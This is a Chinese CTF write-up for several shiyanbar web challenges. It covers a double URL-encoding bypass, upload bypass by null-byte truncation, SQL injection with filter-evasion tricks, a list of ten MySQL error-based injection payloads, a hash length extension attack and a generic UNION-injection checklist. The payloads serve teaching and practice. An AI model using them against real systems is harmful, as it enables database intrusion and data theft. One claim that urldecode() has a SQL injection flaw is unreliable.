PHP大法

http://ctf5.shiyanbar.com/DUTCTF/index.php

页面:
Notice: Use of undefined constant id - assumed ‘id’ in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 2

Notice: Undefined index: id in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 2

Deprecated: Function eregi() is deprecated in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 2

Notice: Use of undefined constant id - assumed ‘id’ in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 7

Notice: Use of undefined constant id - assumed ‘id’ in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 7

Notice: Undefined index: id in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 7

Notice: Use of undefined constant id - assumed ‘id’ in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 8

Can you authenticate to this website? index.php.txt

访问index.php.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
if(eregi("hackerDJ",$_GET[id])) {
echo("<p>not allowed!</p>");
exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
echo "<p>Access granted!</p>";
echo "<p>flag: *****************} </p>";
}
?>


<br><br>
Can you authenticate to this website?

eregi()函数查找数组中的字符串,当查找到“hackerDJ”时输出“not allowed!”
urldecode()函数存在sql注入漏洞,会对字符串进行二次编码
只要输入二次编码后的字符串就行
%25解码后为%,与后面的68结合成%68进行二次解码,解码为h

payload:http://ctf5.shiyanbar.com/DUTCTF/index.php?id=%2568ackerDJ


上传绕过

http://ctf5.shiyanbar.com/web/upload

进入是个文件上传页面,尝试上传一句话木马(.php),提示必须上传图片格式
上传图片后提示后缀必须为.php
文件上传绕过,有四种方法:文件名大小写绕过,特殊文件名绕过,0x00截断绕过,.htaccess文件攻击
这题用%00截断


简单的sql注入

提示有过滤
http://ctf5.shiyanbar.com/423/web/

源码:

1
2
3
4
5
6
7
8
9
10
11
12
<html>
<head>
<title>1</title>
</head>
<body>
<div style="text-align:center">
<h2>flag<h2>
<h3>到底过滤了什么东西?<h3>
<form action="" method="get">
<input name="id" type="text"/>
<input type="submit" />
</form>

查看源代码发现是get传参
id=1,name=baloteli
1’ 报错
查表字段union select 被过滤
unionunion selectselect 空格被过滤
试了一堆,过滤了and、union、select、空格、from和where,所以构造语句要写两遍
用database()函数查看id下的信息
1’ unionunion selectselect database()’
出现web1用户
ID: 1’ union select database()’
name: baloteli
ID: 1’ union select database()’
name: web1
接着查表


资料

对于mysql和Infobright等数据库,information_schema数据库中的表都是只读的,不能进行更新、删除和插入等操作,也不能加触发器,因为它们实际只是一个视图,不是基本表,没有关联的文件。
information_schema.tables存储了数据表的元数据信息,下面对常用的字段进行介绍:
table_schema: 记录数据库名;
table_name: 记录数据表名;
engine : 存储引擎;
table_rows: 关于表的粗略行估计;
data_length : 记录表的大小(单位字节);
index_length : 记录表的索引的大小;
row_format: 可以查看数据表是否压缩过;


语句:1’ unionunion selectselect table_name fromfrom information_schema.tables wherewhere ‘1’=’1

出现两条关键语句
ID: 1’ union select table_name from information_schema.tables where ‘1’=’1
name: admin
ID: 1’ union select table_name from information_schema.tables where ‘1’=’1
name: flag

再查询字段名:
1’ unionunion selectselect column_namcolumn_namee fromfrom information_schema.coluinformation_schema.columnsmns wherewhere table_name=’flag

ID: 1’ union select column_name from information_schema.columns where table_name=’flag
name: baloteli
ID: 1’ union select column_name from information_schema.columns where table_name=’flag
name: flag
ID: 1’ union select column_name from information_schema.columns where table_name=’flag
name: id

出现flag字段,最后直接查flag
1’ unionunion selectselect flag fromfrom flag wherewhere ‘1’=’1

得到flag


简单的sql注入2

提示有回显
http://ctf5.shiyanbar.com/web/index_2.php

按照上一题的思路
输入1,1’报错,1 ‘ 回显SQLi detected!
空格被过滤
1' union select table_name from information_schema.tables where '1'='1
空格用//代替
`1’/
/union//select//table_name//from//information_schema.tables//where//‘1’=’1`
得到关键语句

1
2
3
4
5
6
ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: admin
ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: flag
ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: web_1

接着查字段名
1' union select column_name from information_schema.columns where table_name='flag
1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag
得到flag字段

1
2
ID: 1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag
name: flag

查flag
1' union select flag from flag where '1'='1
1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
得到flag


简单的sql注入3

提示mysql报错注入
http://ctf5.shiyanbar.com/web/index_3.php

输入1,出现Hello!
输入1’,报错:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\h43a1W3\phpstudy\WWW\web\index_3.php on line 30
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’1’’’ at line 1
报错提示了mysql_fetch_array()函数
函数定义:
mysql_fetch_array() 函数从结果集中取得一行作为关联数组,或数字数组,或二者兼有
返回根据从结果集取得的行生成的数组,如果没有更多行则返回 false。


上网找了十种mysql报错注入函数

1.floor()

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.extractvalue()

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3.updatexml()

select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp()

select * from test where id=1 and exp(~(select * from(select user())a));


尝试发现前三个函数均返回Don’t!,尝试用exp()
爆库名:'or EXP(~(SELECT * from(select database())a))#
出现 DOUBLE value is out of range in 'exp(~((select 'web1' from dual)))'
爆表名:'or EXP(~(SELECT * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a))#
出现 DOUBLE value is out of range in 'exp(~((select 'flag,web_1' from dual)))'
爆列名:'or EXP(~(SELECT * from(select group_concat(column_name) from information_schema.columns where table_name='flag')a))#
出现 DOUBLE value is out of range in 'exp(~((select 'flag,id' from dual)))'
查flag:'or EXP(~(SELECT * from(select group_concat(flag) from flag)a))#
得到flag
DOUBLE value is out of range in 'exp(~((select 'flag{Y0u_@r3_5O_dAmn_90Od}' from dual)))'


让我进去

相信你一定能拿到想要的
Hint:你可能希望知道服务器端发生了什么。。
http://ctf5.shiyanbar.com/web/kzhan.php

查看源码,发现是post传参
随便传个username和password值,用burpsuite抓包,改cookie里source=1,得到源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<html>
<body>

<pre>
$flag = "XXXXXXXXXXXXXXXXXXXXXXX";
$secret = "XXXXXXXXXXXXXXX"; // This secret is 15 characters long for security!

$username = $_POST["username"];
$password = $_POST["password"];

if (!empty($_COOKIE["getmein"])) {
if (urldecode($username) === "admin" && urldecode($password) != "admin") {
if ($COOKIE["getmein"] === md5($secret . urldecode($username . $password))) {
echo "Congratulations! You are a registered user.\n";
die ("The flag is ". $flag);
}
else {
die ("Your cookies don't match up! STOP HACKING THIS SITE.");
}
}
else {
die ("You are not an admin! LEAVE.");
}
}

setcookie("sample-hash", md5($secret . urldecode("admin" . "admin")), time() + (60 * 60 * 24 * 7));

if (empty($_COOKIE["source"])) {
setcookie("source", 0, time() + (60 * 60 * 24 * 7));
}
else {
if ($_COOKIE["source"] != 0) {
echo ""; // This source code is outputted here
}
}
</pre>
<h1>Admins Only!</h1>
<p>If you have the correct credentials, log in below. If not, please LEAVE.</p>
<form method="POST">
Username: <input type="text" name="username"> <br>
Password: <input type="password" name="password"> <br>
<button type="submit">Submit</button>
</form>

</body>
</html>

需要构造一个符合
$COOKIE["getmein"] === md5($secret . urldecode($username . $password))
setcookie("sample-hash", md5($secret . urldecode("admin" . "admin")), time() + (60 * 60 * 24 * 7));
的getmein条件
$secret为长度15的字符串,构造一个前面为xxxxxxxxxxxxxxxadminadmin的大于64位的字符串,得到其hash值

Hash拓展长度攻击


这个看起来有点简单!

http://ctf5.shiyanbar.com/8/index.php?id=1

输入1’ ,报错:mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\h43a1W3\phpstudy\WWW\8\index.php on line 35
继续输入 and 1=1,没报错,and 1=2,返回空表,存在注入
order by 1,2 没报错,3报错
查数据库 and 1=2 union select 1,database() 查出表my_db
查数据库版本 and 1=2 union select 1,version() 5.5.47
接着查表 and 1=2 union select 1, table_name from information_schema.tables
出现 news thiskey admin 三个关键字段名
查列 and 1=2 union select 1, column_name from information_schema.columns where table_schema='my_db' and table_name='thiskey' 得到字段k0y
然后查flag and 1=2 union select 1, k0y from thiskey


以上的总结

遇到有sql注入提示的题目:

  1. and 1=1 and 1=2 检验是否存在sql注入
  2. 查数据库 and 1=2 union select 1,database()
  3. 查数据库版本 and 1=2 union select 1,version()
  4. 查表 and 1=2 union select 1, table_name from information_schema.tables
  5. 查列 and 1=2 union select 1, column_name from information_schema.columns where table_schema='' and table_name=''
  6. 查flag and 1=2 union select 1, from